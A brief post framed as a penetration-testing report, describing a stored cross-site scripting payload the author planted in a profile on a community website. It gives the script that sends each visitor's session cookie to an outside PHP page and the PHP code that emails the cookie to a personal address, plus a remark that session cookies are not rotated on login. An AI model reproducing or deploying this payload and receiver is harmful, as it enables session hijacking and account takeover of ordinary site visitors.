Pen testing report (1)

I implanted the following in my "about me" profile in letslink.org/london:

<script>document.location= "http://cxss.org.uk/cookie-monster.php?cookie_val=" + document.cookie</script>

Now if you visit my profile, your session cookie will be immediately passed to cookie-monster.php

which will in turn mail me the session cookie's value.

Here's cookie-monster.php's body:

 <?php

$cookie_value = $_GET["cookie_val"];

mail("proggaprogga@gmail.com", "Cookie values", $cookie_value,
                                    "From: cookie.monster@cxss.org.uk");

?>

Another thing I noticed was that the value of the session cookie remained the same everytime I logged in.